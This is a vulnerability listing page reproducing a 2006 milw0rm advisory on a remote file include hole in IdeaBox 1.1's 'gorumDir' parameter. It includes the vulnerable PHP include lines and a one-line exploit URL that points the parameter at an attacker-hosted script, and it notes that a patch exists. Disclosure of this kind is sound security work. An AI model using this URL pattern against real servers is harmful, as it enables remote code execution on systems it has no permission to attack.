header-logo
Suggest Exploit
vendor:
IdeaBox
by:
Kacper (a.k.a Rahim)
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: IdeaBox
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

IdeaBox <= 1.1 (gorumDir) Remote File Include Vulnerability

IdeaBox version 1.1 and below is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This request contains a URL in the 'gorumDir' parameter which points to a malicious file on a remote server. This malicious file is then included and executed on the vulnerable server.

Mitigation:

Upgrade to the latest version of IdeaBox.
Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  IdeaBox <= 1.1 (gorumDir) Remote File Include Vulnerability
$$  script site: http://ideabox.phpoutsourcing.com/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
/*
19 Czerwca 2006r. Znikam na miesiac jade na wakacje :-)
---------------------------------------------------------------
19 June 2006 go to vacations !!!! I return for month, Cya ;-)
*/


#include.php:
/*
include("$gorumDir/generformlib_date.php");
include("$gorumDir/notification.php");
include("$gorumDir/zmail.php");
include("$ideaDir/user.php");
include("$ideaDir/globalsettings.php");
include("$ideaDir/init.php");
include("$ideaDir/idea.php");
include("$ideaDir/history.php");
include("$ideaDir/cord.php");
*/


#Expl:


http://www.site.com/[IdeaBox_path]/include.php?gorumDir=[evil_scripts]


#Pozdro dla wszystkich ;-)

# milw0rm.com [2006-06-19]